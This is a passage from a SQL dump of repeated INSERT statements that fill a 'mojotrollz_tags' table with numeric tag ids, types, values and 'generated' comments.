'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12242, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12242, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12242, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12243, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12243, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12243, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12244, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12244, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12245, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12245, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12246, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12246, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12247, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12247, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12248, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12248, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12249, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12249, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12250, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12250, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12251, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12251, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12252, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12252, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12253, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12253, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12254, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12254, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12255, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12255, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12256, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12256, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12257, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12258, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12258, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12258, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12259, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12259, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12259, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12260, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12261, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12262, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12262, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12263, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12263, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12264, 1, 1, 409, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12264, 1, 2, 2717, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12264, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12265, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12276, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12277, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12277, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12296, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12296, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12296, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12296, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12296, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12297, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12298, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12298, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12299, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12319, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12320, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12321, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12322, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12322, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12336, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12337, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12337, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12338, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12338, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12339, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12340, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12340, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12341, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12341, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12342, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12342, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12343, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12343, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12344, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12345, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12346, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12346, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12346, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12347, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12347, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12348, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12349, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12349, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12349, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12350, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12350, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12350, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12351, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12351, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12351, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12351, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12351, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12351, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12352, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12353, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12353, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12353, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12353, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12353, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12353, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12354, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12354, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12355, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12355, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12357, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12358, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12358, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12359, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12359, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12360, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12360, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12361, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12362, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12363, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12363, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12364, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12364, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12365, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12365, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12366, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12366, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12367, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12367, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12368, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12369, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12370, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12371, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12372, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12372, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12373, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12373, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12374, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12374, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12375, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12375, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12376, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12377, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12377, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12378, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12378, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12379, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12380, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12380, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12381, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12382, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12383, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12383, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12384, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12384, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12387, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12387, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12396, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12396, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12397, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12397, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12416, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12418, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12418, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12419, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12420, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12422, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12423, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12423, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12425, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12425, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12426, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12427, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12427, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12428, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12428, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12429, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12429, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12430, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12430, 1, 2, 14, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12430, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12430, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12430, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12431, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12431, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12432, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12432, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12433, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12433, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12434, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12434, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12434, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12435, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12435, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12435, 1, 30, 3, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12457, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12457, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12457, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12458, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12458, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12458, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12459, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12459, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12459, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12460, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12460, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12460, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12461, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12461, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12461, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12463, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12463, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12463, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12464, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12464, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12464, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12465, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12465, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12465, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12467, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12467, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12467, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12468, 1, 1, 469, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12468, 1, 2, 2677, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12468, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12473, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12474, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12474, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12475, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12475, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12476, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (12476, 1, 